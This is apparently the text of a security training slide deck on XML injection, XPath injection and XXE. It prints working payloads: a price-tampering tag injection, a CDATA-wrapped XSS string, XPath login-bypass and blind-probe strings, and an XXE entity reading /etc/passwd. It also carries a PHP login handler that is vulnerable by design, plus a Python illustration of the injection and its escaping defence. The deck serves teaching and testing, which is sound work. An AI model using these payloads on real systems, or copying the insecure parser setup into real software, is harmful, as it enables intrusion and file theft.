2. About Me
➢ Student at UCSY
➢ Programmer
➢ Security Enthusiast
➢ Contributor at OWASP Myanmar
➢ Organizer at Myanmar Cyber Conference
3. What is XML?
● Extensible Markup Language (XML)
● Textual Data Format
● Focus on Documents
● Used to annotate text or add additional information
● Relies on Document Type Definition (DTD)
4. XML Structure
● XML Header (Document Type Definition – DTD)
<?xml version="1.0" encoding="ISO-8859-1"?>
● Elements
<item>
<itemId> 1 </itemId>
<itemName> Book </itemName>
</item>
6. Types of XML vulnerabilities
XML Injection (TAG Injection)
XPath Injection
XML External Entities (XXE)
7. XML Injection
● Inject XML into the application's input; the flaw exists when the XML parser fails
to validate the data
● Try to insert XML characters, tags, methods, etc.
● Possible to inject XML data and tags into an XML database
● Possible to test with a single quote ' when input is not sanitized
Example: <username attrib='$usernameInput' /> — when a single quote is added,
it becomes
<username attrib='admin'' />
9. Testing for XML Injection
● Different attack surfaces: input fields like user registration, update information, and so on.
● Both GET and POST
● Use Escape Characters to invalidate XML document
10. Exploitation for XML Injection
● Inject a new value for an existing element
<username> Toe </username>
● Using the comment tag <!-- Tag -->
<!-- username --> <username>Toe</username>
● CDATA section delimiters
<username><![CDATA[<$userName]]></username>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
11. Example Code
<book>
<id> 102 </id>
<bookName> Sherlock </bookName>
<price> 200 </price>
</book>
When a user buys a book from the store, the URL may look like
http://shop.com/buy.php?bookID=102&bookName=Sherlock&price=200
When the attacker injects a new price element alongside the existing price tag
http://shop.com/buy.php?bookID=102&bookName=Sherlock&<price>0</price>
the stored document becomes
<book>
<id> 102 </id>
<bookName> Sherlock </bookName>
<price> 0 </price>
<price> 200 </price>
</book>
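The bookstore injection above and the single-quote probe from slide 7, as an added example that is not part of the original deck: a naive string template lets a crafted bookName smuggle in a second price element, while building the document with ElementTree escapes the markup. The function names and the constructed INJECTED_NAME value are assumptions made for this illustration.

```python
import xml.etree.ElementTree as ET

# Constructed attacker-controlled bookName: it carries the deck's <price>0</price>
# injection so that a second price element lands before the real one.
INJECTED_NAME = "Sherlock</bookName><price>0</price><bookName>"

def build_order_naive(book_id, book_name, price):
    """Vulnerable: untrusted values are pasted into an XML template as raw text."""
    return (f"<book><id>{book_id}</id><bookName>{book_name}</bookName>"
            f"<price>{price}</price></book>")

def build_order_safe(book_id, book_name, price):
    """Hardened: ElementTree builds the tree and escapes <, > and & in text nodes."""
    book = ET.Element("book")
    ET.SubElement(book, "id").text = str(book_id)
    ET.SubElement(book, "bookName").text = str(book_name)
    ET.SubElement(book, "price").text = str(price)
    return ET.tostring(book, encoding="unicode")

def price_values(xml_text):
    """Return the text of every <price> child of <book>, in document order."""
    return [p.text.strip() for p in ET.fromstring(xml_text).findall("price")]

def looks_injected(xml_text, expected=("id", "bookName", "price")):
    """Detection check: a legitimate order has exactly one of each expected child."""
    root = ET.fromstring(xml_text)
    return any(len(root.findall(tag)) != 1 for tag in expected)

def user_attr_naive(name):
    """Vulnerable attribute template from slide 7."""
    return f"<username attrib='{name}' />"

def well_formed(xml_text):
    """A stray single quote in the attribute template makes the document unparseable."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False

if __name__ == "__main__":
    bad = build_order_naive(102, INJECTED_NAME, 200)
    good = build_order_safe(102, INJECTED_NAME, 200)
    print(price_values(bad), looks_injected(bad))    # ['0', '200'] True
    print(price_values(good), looks_injected(good))  # ['200'] False
    print(well_formed(user_attr_naive("admin'")))    # False
```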
12. XML Injection Cheat Sheets
https://github.com/toekhaing/xml_attacks/blob/master/xml_injection.txt
13. XPath Injection
● XPath refers to XML Path Language
● XPath Injection is similar to SQL injection.
● Another type of XML injection
● Less awareness
● Occurs when unsanitized input is placed into an XPath query over XML data
● Possible to retrieve the entire document
14. Detection for XPath Injection
● ' Single Quote
● " Double Quote
● ' or 'a'='a
● ' and 'a'='b
● OR 1=1
● AND 1=2
15. Exploitation for XPath Injection
Common XPath Payloads
' or '1'='1
' or 1=1 or '='
]|*|user[@role='admin
"NODENAME" (selects all child elements named NODENAME of the current node)
"//NODENAME" (selects all NODENAME elements anywhere in the document)
"NODENAME//SUBNODENAME" (selects all SUBNODENAME descendants of NODENAME elements)
"//NODENAME[NAME="VALUE"]" (e.g. VALUE = admin)
16. Blind XPath Injection
● count(//user/child::node()) - returns the number of child nodes
● Find the error by injecting the following probes
' or count(parent::*[position()=1])=0 or 'a'='b
' or count(parent::*[position()=1])>0 or 'a'='b
1 or count(parent::*[position()=1])=0
1 or count(parent::*[position()=1])>0
17. Example Attack & Resources
● Login Bypass
http://site.com/login.php?username=admin' or 1=1 or ''='
● Tools
Xcat (https://github.com/orf/xcat)
● Cheat Sheets
https://github.com/toekhaing/xml_attacks/blob/master/xpath_Injection.txt
18. XML External Entities (XXE)
● A type of injection attack against an application that parses XML input.
● Caused by a misconfigured XML parser.
● Leads to Extracting Sensitive Data
● Remote Code Execution (RCE) in some cases
19. Common XXE Vulnerabilities
● Apache POI
● CVE-2014-3574
● CVE-2014-3529
● DOCX4J
● OpenXML SDK
● NOKOGIRI
● CVE-2012-6685
● CVE-2014-3660
● Play Framework XXE
20. Finding XXE Flaws
● Wide Attack Surface
● Registration page, login page, file upload, etc.
● Check for requests whose Content-Type is XML
21. Detection for XXE Vulnerability
● Read local files on the web server by using a SYSTEM entity
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
● Make the parser process a remote Document Type Declaration (DTD)
<!ENTITY xxe SYSTEM "http://IP:PORT/test.dtd">
● File Upload (OOXML)
Upload xml, docx or xlsx files with an embedded XXE payload.
22. Example Attack
PHP Code (vulnerable by design)
<?php
// Entity loading is re-enabled and LIBXML_NOENT substitutes entities, so an
// external entity in the request body is resolved by the parser.
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');   // raw request body
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->user;   // the expanded entity value ends up here
$pass = $creds->pass;
echo "You have logged in as user $user";
?>
Request
<login>
<user>Toe</user>
<pass>mypass</pass>
</login>
23. Exploitation
Simple XXE payload that extracts the local file /etc/passwd
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<login>
<user>&xxe;</user>
<pass>mypass</pass>
</login>
27. Case Study
Pentester Lab : Play XML Entities
https://www.vulnhub.com/entry/pentester-lab-play-xml-entities,119
Notes & Collections of XML Attacks
https://github.com/toekhaing/xml_attacks